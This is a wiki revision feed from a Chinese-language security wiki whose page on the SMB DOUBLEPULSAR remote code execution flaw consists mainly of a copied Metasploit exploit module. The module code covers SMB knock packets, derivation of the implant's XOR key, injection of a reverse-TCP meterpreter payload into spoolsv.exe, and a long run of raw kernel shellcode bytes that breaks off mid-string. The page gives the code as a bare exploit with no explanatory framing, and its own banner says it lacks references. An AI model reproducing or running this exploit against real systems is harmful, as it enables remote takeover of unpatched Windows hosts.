https://pwnwiki.com/index.php?action=history&feed=atom&title=SMB_DOUBLEPULSAR%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
SMB DOUBLEPULSAR遠程代碼執行漏洞 - Revision history
2026-04-05T07:06:28Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=SMB_DOUBLEPULSAR%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=105&oldid=prev
Pwnwiki: /* EXP */
2021-03-01T02:01:29Z
<p><span dir="auto"><span class="autocomment">EXP</span></span></p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 02:01, 1 March 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>{| style="margin: auto; width: 750px;"</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>{| style="margin: auto; width: 750px;"</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>| style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" |</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>| style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" |</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>{| cellspacing="2px" </div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>{| cellspacing="2px"</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>| valign="middle" | [[Image:Book.png|50px]]</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>| valign="middle" | [[Image:Book.png|50px]]</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>| 這個頁面的內容缺少參考,無法保證內容的準確性。</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>| 這個頁面的內容缺少參考,無法保證內容的準確性。</div></td></tr>
<tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l9" >Line 9:</td>
<td colspan="2" class="diff-lineno">Line 9:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>==EXP==</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==EXP<ins class="diffchange diffchange-inline">:</ins>==</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div> </div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>##<font></font></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>##<font></font></div></td></tr>
<tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l407" >Line 407:</td>
<td colspan="2" class="diff-lineno">Line 406:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div># 0day.today [2020-03-20] #</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div># 0day.today [2020-03-20] #</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;"></del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>==作者:==</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>==作者:==</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Metasploit</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Metasploit</div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-104:rev-105 -->
</table>
Pwnwiki
https://pwnwiki.com/index.php?title=SMB_DOUBLEPULSAR%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=104&oldid=prev
Pwnwiki: 建立內容為「{| style="margin: auto; width: 750px;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing="2px" | vali…」的新頁面
2021-03-01T02:01:03Z
<p>建立內容為「{| style="margin: auto; width: 750px;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing="2px" | vali…」的新頁面</p>
<p><b>New page</b></p><div>{| style="margin: auto; width: 750px;"<br />
| style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" |<br />
{| cellspacing="2px" <br />
| valign="middle" | [[Image:Book.png|50px]]<br />
| 這個頁面的內容缺少參考,無法保證內容的準確性。<br />
|}<br />
|}<br />
<br><noinclude><br />
<br />
<br />
==EXP==<br />
<br />
<pre><br />
##<font></font><br />
# This module requires Metasploit: https://metasploit.com/download<font></font><br />
# Current source: https://github.com/rapid7/metasploit-framework<font></font><br />
##<font></font><br />
<font></font><br />
class MetasploitModule < Msf::Exploit::Remote<font></font><br />
<font></font><br />
Rank = GreatRanking<font></font><br />
<font></font><br />
include Msf::Exploit::Remote::SMB::Client<font></font><br />
include Msf::Module::Deprecated<font></font><br />
<font></font><br />
moved_from 'exploit/windows/smb/doublepulsar_rce'<font></font><br />
<font></font><br />
MAX_SHELLCODE_SIZE = 4096<font></font><br />
<font></font><br />
def initialize(info = {})<font></font><br />
super(update_info(info,<font></font><br />
'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',<font></font><br />
'Description' => %q{<font></font><br />
This module executes a Metasploit payload against the Equation Group's<font></font><br />
DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.<font></font><br />
<font></font><br />
While this module primarily performs code execution against the implant,<font></font><br />
the "Neutralize implant" target allows you to disable the implant.<font></font><br />
},<font></font><br />
'Author' => [<font></font><br />
'Equation Group', # DOUBLEPULSAR implant<font></font><br />
'Shadow Brokers', # Equation Group dump<font></font><br />
'zerosum0x0', # DOPU analysis and detection<font></font><br />
'Luke Jennings', # DOPU analysis and detection<font></font><br />
'wvu', # Metasploit module and arch detection<font></font><br />
'Jacob Robles' # Metasploit module and RCE help<font></font><br />
],<font></font><br />
'References' => [<font></font><br />
['MSB', 'MS17-010'],<font></font><br />
['CVE', '2017-0143'],<font></font><br />
['CVE', '2017-0144'],<font></font><br />
['CVE', '2017-0145'],<font></font><br />
['CVE', '2017-0146'],<font></font><br />
['CVE', '2017-0147'],<font></font><br />
['CVE', '2017-0148'],<font></font><br />
['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],<font></font><br />
['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],<font></font><br />
['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],<font></font><br />
['URL', 'https://github.com/countercept/doublepulsar-detection-script'],<font></font><br />
['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],<font></font><br />
['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']<font></font><br />
],<font></font><br />
'DisclosureDate' => '2017-04-14', # Shadow Brokers leak<font></font><br />
'License' => MSF_LICENSE,<font></font><br />
'Platform' => 'win',<font></font><br />
'Arch' => ARCH_X64,<font></font><br />
'Privileged' => true,<font></font><br />
'Payload' => {<font></font><br />
'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,<font></font><br />
'DisableNops' => true<font></font><br />
},<font></font><br />
'Targets' => [<font></font><br />
['Execute payload (x64)',<font></font><br />
'DefaultOptions' => {<font></font><br />
'EXITFUNC' => 'thread',<font></font><br />
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'<font></font><br />
}<font></font><br />
],<font></font><br />
['Neutralize implant',<font></font><br />
'DefaultOptions' => {<font></font><br />
'PAYLOAD' => nil # XXX: "Unset" generic payload<font></font><br />
}<font></font><br />
]<font></font><br />
],<font></font><br />
'DefaultTarget' => 0,<font></font><br />
'Notes' => {<font></font><br />
'AKA' => ['DOUBLEPULSAR'],<font></font><br />
'RelatedModules' => [<font></font><br />
'auxiliary/scanner/smb/smb_ms17_010',<font></font><br />
'exploit/windows/smb/ms17_010_eternalblue'<font></font><br />
],<font></font><br />
'Stability' => [CRASH_OS_DOWN],<font></font><br />
'Reliability' => [REPEATABLE_SESSION]<font></font><br />
}<font></font><br />
))<font></font><br />
<font></font><br />
register_advanced_options([<font></font><br />
OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),<font></font><br />
OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])<font></font><br />
])<font></font><br />
end<font></font><br />
<font></font><br />
OPCODES = {<font></font><br />
ping: 0x23,<font></font><br />
exec: 0xc8,<font></font><br />
kill: 0x77<font></font><br />
}.freeze<font></font><br />
<font></font><br />
STATUS_CODES = {<font></font><br />
not_detected: 0x00,<font></font><br />
success: 0x10,<font></font><br />
invalid_params: 0x20,<font></font><br />
alloc_failure: 0x30<font></font><br />
}.freeze<font></font><br />
<font></font><br />
def calculate_doublepulsar_status(m1, m2)<font></font><br />
STATUS_CODES.key(m2.to_i - m1.to_i)<font></font><br />
end<font></font><br />
<font></font><br />
# algorithm to calculate the XOR Key for DoublePulsar knocks<font></font><br />
def calculate_doublepulsar_xor_key(s)<font></font><br />
x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))<font></font><br />
x & 0xffffffff # this line was added just to truncate to 32 bits<font></font><br />
end<font></font><br />
<font></font><br />
# The arch is adjacent to the XOR key in the SMB signature<font></font><br />
def calculate_doublepulsar_arch(s)<font></font><br />
s == 0 ? ARCH_X86 : ARCH_X64<font></font><br />
end<font></font><br />
<font></font><br />
def generate_doublepulsar_timeout(op)<font></font><br />
k = SecureRandom.random_bytes(4).unpack1('V')<font></font><br />
0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00<font></font><br />
end<font></font><br />
<font></font><br />
def generate_doublepulsar_param(op, body)<font></font><br />
case OPCODES.key(op)<font></font><br />
when :ping, :kill<font></font><br />
"\x00" * 12<font></font><br />
when :exec<font></font><br />
Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))<font></font><br />
end<font></font><br />
end<font></font><br />
<font></font><br />
def check<font></font><br />
ipc_share = "\\\\#{rhost}\\IPC$"<font></font><br />
<font></font><br />
@tree_id = do_smb_setup_tree(ipc_share)<font></font><br />
vprint_good("Connected to #{ipc_share} with TID = #{@tree_id}")<font></font><br />
vprint_status("Target OS is #{smb_peer_os}")<font></font><br />
<font></font><br />
print_status('Sending ping to DOUBLEPULSAR')<font></font><br />
code, signature1, signature2 = do_smb_doublepulsar_pkt<font></font><br />
msg = 'Host is likely INFECTED with DoublePulsar!'<font></font><br />
<font></font><br />
case calculate_doublepulsar_status(@multiplex_id, code)<font></font><br />
when :success<font></font><br />
@xor_key = calculate_doublepulsar_xor_key(signature1)<font></font><br />
@arch = calculate_doublepulsar_arch(signature2)<font></font><br />
<font></font><br />
arch_str =<font></font><br />
case @arch<font></font><br />
when ARCH_X86<font></font><br />
'x86 (32-bit)'<font></font><br />
when ARCH_X64<font></font><br />
'x64 (64-bit)'<font></font><br />
end<font></font><br />
<font></font><br />
print_warning("#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}")<font></font><br />
CheckCode::Vulnerable<font></font><br />
when :not_detected<font></font><br />
print_error('DOUBLEPULSAR not detected or disabled')<font></font><br />
CheckCode::Safe<font></font><br />
else<font></font><br />
print_error('An unknown error occurred')<font></font><br />
CheckCode::Unknown<font></font><br />
end<font></font><br />
end<font></font><br />
<font></font><br />
def exploit<font></font><br />
if datastore['DefangedMode']<font></font><br />
warning = <<~EOF<font></font><br />
<font></font><br />
<font></font><br />
Are you SURE you want to execute code against a nation-state implant?<font></font><br />
You MAY contaminate forensic evidence if there is an investigation.<font></font><br />
<font></font><br />
Disable the DefangedMode option if you have authorization to proceed.<font></font><br />
EOF<font></font><br />
<font></font><br />
fail_with(Failure::BadConfig, warning)<font></font><br />
end<font></font><br />
<font></font><br />
# No ForceExploit because @tree_id and @xor_key are required<font></font><br />
unless check == CheckCode::Vulnerable<font></font><br />
fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')<font></font><br />
end<font></font><br />
<font></font><br />
case target.name<font></font><br />
when 'Execute payload (x64)'<font></font><br />
unless @xor_key<font></font><br />
fail_with(Failure::NotFound, 'XOR key not found')<font></font><br />
end<font></font><br />
<font></font><br />
if @arch == ARCH_X86<font></font><br />
fail_with(Failure::NoTarget, 'x86 is not a supported target')<font></font><br />
end<font></font><br />
<font></font><br />
print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}")<font></font><br />
shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])<font></font><br />
shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)<font></font><br />
vprint_status("Total shellcode length: #{shellcode.length} bytes")<font></font><br />
<font></font><br />
print_status("Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}")<font></font><br />
xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)<font></font><br />
<font></font><br />
print_status('Sending shellcode to DOUBLEPULSAR')<font></font><br />
code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)<font></font><br />
when 'Neutralize implant'<font></font><br />
return neutralize_implant<font></font><br />
end<font></font><br />
<font></font><br />
case calculate_doublepulsar_status(@multiplex_id, code)<font></font><br />
when :success<font></font><br />
print_good('Payload execution successful')<font></font><br />
when :invalid_params<font></font><br />
fail_with(Failure::BadConfig, 'Invalid parameters were specified')<font></font><br />
when :alloc_failure<font></font><br />
fail_with(Failure::PayloadFailed, 'An allocation failure occurred')<font></font><br />
else<font></font><br />
fail_with(Failure::Unknown, 'An unknown error occurred')<font></font><br />
end<font></font><br />
ensure<font></font><br />
disconnect<font></font><br />
end<font></font><br />
<font></font><br />
def neutralize_implant<font></font><br />
print_status('Neutralizing DOUBLEPULSAR')<font></font><br />
code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])<font></font><br />
<font></font><br />
case calculate_doublepulsar_status(@multiplex_id, code)<font></font><br />
when :success<font></font><br />
print_good('Implant neutralization successful')<font></font><br />
else<font></font><br />
fail_with(Failure::Unknown, 'An unknown error occurred')<font></font><br />
end<font></font><br />
end<font></font><br />
<font></font><br />
def do_smb_setup_tree(ipc_share)<font></font><br />
connect<font></font><br />
<font></font><br />
# logon as user \<font></font><br />
simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])<font></font><br />
<font></font><br />
# connect to IPC$<font></font><br />
simple.connect(ipc_share)<font></font><br />
<font></font><br />
# return tree<font></font><br />
simple.shares[ipc_share]<font></font><br />
end<font></font><br />
<font></font><br />
def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)<font></font><br />
# make doublepulsar knock<font></font><br />
pkt = make_smb_trans2_doublepulsar(opcode, body)<font></font><br />
<font></font><br />
sock.put(pkt)<font></font><br />
bytes = sock.get_once<font></font><br />
<font></font><br />
return unless bytes<font></font><br />
<font></font><br />
# convert packet to response struct<font></font><br />
pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct<font></font><br />
pkt.from_s(bytes[4..-1])<font></font><br />
<font></font><br />
return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']<font></font><br />
end<font></font><br />
<font></font><br />
def make_smb_trans2_doublepulsar(opcode, body)<font></font><br />
setup_count = 1<font></font><br />
setup_data = [0x000e].pack('v')<font></font><br />
<font></font><br />
param = generate_doublepulsar_param(opcode, body)<font></font><br />
data = param + body.to_s<font></font><br />
<font></font><br />
pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct<font></font><br />
simple.client.smb_defaults(pkt['Payload']['SMB'])<font></font><br />
<font></font><br />
base_offset = pkt.to_s.length + (setup_count * 2) - 4<font></font><br />
param_offset = base_offset<font></font><br />
data_offset = param_offset + param.length<font></font><br />
<font></font><br />
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2<font></font><br />
pkt['Payload']['SMB'].v['Flags1'] = 0x18<font></font><br />
pkt['Payload']['SMB'].v['Flags2'] = 0xc007<font></font><br />
<font></font><br />
@multiplex_id = rand(0xffff)<font></font><br />
<font></font><br />
pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count<font></font><br />
pkt['Payload']['SMB'].v['TreeID'] = @tree_id<font></font><br />
pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id<font></font><br />
<font></font><br />
pkt['Payload'].v['ParamCountTotal'] = param.length<font></font><br />
pkt['Payload'].v['DataCountTotal'] = body.to_s.length<font></font><br />
pkt['Payload'].v['ParamCountMax'] = 1<font></font><br />
pkt['Payload'].v['DataCountMax'] = 0<font></font><br />
pkt['Payload'].v['ParamCount'] = param.length<font></font><br />
pkt['Payload'].v['ParamOffset'] = param_offset<font></font><br />
pkt['Payload'].v['DataCount'] = body.to_s.length<font></font><br />
pkt['Payload'].v['DataOffset'] = data_offset<font></font><br />
pkt['Payload'].v['SetupCount'] = setup_count<font></font><br />
pkt['Payload'].v['SetupData'] = setup_data<font></font><br />
pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)<font></font><br />
pkt['Payload'].v['Payload'] = data<font></font><br />
<font></font><br />
pkt.to_s<font></font><br />
end<font></font><br />
<font></font><br />
# ring3 = user mode encoded payload<font></font><br />
# proc_name = process to inject APC into<font></font><br />
def make_kernel_user_payload(ring3, proc_name)<font></font><br />
sc = make_kernel_shellcode(proc_name)<font></font><br />
<font></font><br />
sc << [ring3.length].pack('S<')<font></font><br />
sc << ring3<font></font><br />
<font></font><br />
sc<font></font><br />
end<font></font><br />
<font></font><br />
def generate_process_hash(process)<font></font><br />
# x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm<font></font><br />
proc_hash = 0<font></font><br />
process << "\x00"<font></font><br />
<font></font><br />
process.each_byte do |c|<font></font><br />
proc_hash = ror(proc_hash, 13)<font></font><br />
proc_hash += c<font></font><br />
end<font></font><br />
<font></font><br />
[proc_hash].pack('l<')<font></font><br />
end<font></font><br />
<font></font><br />
def ror(dword, bits)<font></font><br />
(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF<font></font><br />
end<font></font><br />
<font></font><br />
def make_kernel_shellcode(proc_name)<font></font><br />
# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm<font></font><br />
# Length: 780 bytes<font></font><br />
"\x31\xc9\x41\xe2\x01\xc3\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53" \<font></font><br />
"\x55\x48\x89\xe5\x66\x83\xe4\xf0\x48\x83\xec\x20\x4c\x8d\x35\xe3" \<font></font><br />
"\xff\xff\xff\x65\x4c\x8b\x3c\x25\x38\x00\x00\x00\x4d\x8b\x7f\x04" \<font></font><br />
"\x49\xc1\xef\x0c\x49\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x49" \<font></font><br />
"\x8b\x37\x66\x81\xfe\x4d\x5a\x75\xef\x41\xbb\x5c\x72\x11\x62\xe8" \<font></font><br />
"\x18\x02\x00\x00\x48\x89\xc6\x48\x81\xc6\x08\x03\x00\x00\x41\xbb" \<font></font><br />
"\x7a\xba\xa3\x30\xe8\x03\x02\x00\x00\x48\x89\xf1\x48\x39\xf0\x77" \<font></font><br />
"\x11\x48\x8d\x90\x00\x05\x00\x00\x48\x39\xf2\x72\x05\x48\x29\xc6" \<font></font><br />
"\xeb\x08\x48\x8b\x36\x48\x39\xce\x75\xe2\x49\x89\xf4\x31\xdb\x89" \<font></font><br />
"\xd9\x83\xc1\x04\x81\xf9\x00\x00\x01\x00\x0f\x8d\x66\x01\x00\x00" \<font></font><br />
"\x4c\x89\xf2\x89\xcb\x41\xbb\x66\x55\xa2\x4b\xe8\xbc\x01\x00\x00" \<font></font><br />
"\x85\xc0\x75\xdb\x49\x8b\x0e\x41\xbb\xa3\x6f\x72\x2d\xe8\xaa\x01" \<font></font><br />
"\x00\x00\x48\x89\xc6\xe8\x50\x01\x00\x00\x41\x81\xf9" +<font></font><br />
generate_process_hash(proc_name.upcase) +<font></font><br />
"\x75\xbc\x49\x8b\x1e\x4d\x8d\x6e\x10\x4c\x89\xea\x48\x89\xd9" \<font></font><br />
"\x41\xbb\xe5\x24\x11\xdc\xe8\x81\x01\x00\x00\x6a\x40\x68\x00\x10" \<font></font><br />
"\x00\x00\x4d\x8d\x4e\x08\x49\xc7\x01\x00\x10\x00\x00\x4d\x31\xc0" \<font></font><br />
"\x4c\x89\xf2\x31\xc9\x48\x89\x0a\x48\xf7\xd1\x41\xbb\x4b\xca\x0a" \<font></font><br />
"\xee\x48\x83\xec\x20\xe8\x52\x01\x00\x00\x85\xc0\x0f\x85\xc8\x00" \<font></font><br />
"\x00\x00\x49\x8b\x3e\x48\x8d\x35\xe9\x00\x00\x00\x31\xc9\x66\x03" \<font></font><br />
"\x0d\xd7\x01\x00\x00\x66\x81\xc1\xf9\x00\xf3\xa4\x48\x89\xde\x48" \<font></font><br />
"\x81\xc6\x08\x03\x00\x00\x48\x89\xf1\x48\x8b\x11\x4c\x29\xe2\x51" \<font></font><br />
"\x52\x48\x89\xd1\x48\x83\xec\x20\x41\xbb\x26\x40\x36\x9d\xe8\x09" \<font></font><br />
"\x01\x00\x00\x48\x83\xc4\x20\x5a\x59\x48\x85\xc0\x74\x18\x48\x8b" \<font></font><br />
"\x80\xc8\x02\x00\x00\x48\x85\xc0\x74\x0c\x48\x83\xc2\x4c\x8b\x02" \<font></font><br />
"\x0f\xba\xe0\x05\x72\x05\x48\x8b\x09\xeb\xbe\x48\x83\xea\x4c\x49" \<font></font><br />
"\x89\xd4\x31\xd2\x80\xc2\x90\x31\xc9\x41\xbb\x26\xac\x50\x91\xe8" \<font></font><br />
"\xc8\x00\x00\x00\x48\x89\xc1\x4c\x8d\x89\x80\x00\x00\x00\x41\xc6" \<font></font><br />
"\x01\xc3\x4c\x89\xe2\x49\x89\xc4\x4d\x31\xc0\x41\x50\x6a\x01\x49" \<font></font><br />
"\x8b\x06\x50\x41\x50\x48\x83\xec\x20\x41\xbb\xac\xce\x55\x4b\xe8" \<font></font><br />
"\x98\x00\x00\x00\x31\xd2\x52\x52\x41\x58\x41\x59\x4c\x89\xe1\x41" \<font></font><br />
"\xbb\x18\x38\x09\x9e\xe8\x82\x00\x00\x00\x4c\x89\xe9\x41\xbb\x22" \<font></font><br />
"\xb7\xb3\x7d\xe8\x74\x00\x00\x00\x48\x89\xd9\x41\xbb\x0d\xe2\x4d" \<font></font><br />
"\x85\xe8\x66\x00\x00\x00\x48\x89\xec\x5d\x5b\x41\x5c\x41\x5d\x41" \<font></font><br />
"\x5e\x41\x5f\x5e\xc3\xe9\xb5\x00\x00\x00\x4d\x31\xc9\x31\xc0\xac" \<font></font><br />
"\x41\xc1\xc9\x0d\x3c\x61\x7c\x02\x2c\x20\x41\x01\xc1\x38\xe0\x75" \<font></font><br />
"\xec\xc3\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \<font></font><br />
"\x20\x48\x8b\x12\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x45\x31\xc9" \<font></font><br />
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1" \<font></font><br />
"\xe2\xee\x45\x39\xd9\x75\xda\x4c\x8b\x7a\x20\xc3\x4c\x89\xf8\x41" \<font></font><br />
"\x51\x41\x50\x52\x51\x56\x48\x89\xc2\x8b\x42\x3c\x48\x01\xd0\x8b" \<font></font><br />
"\x80\x88\x00\x00\x00\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20" \<font></font><br />
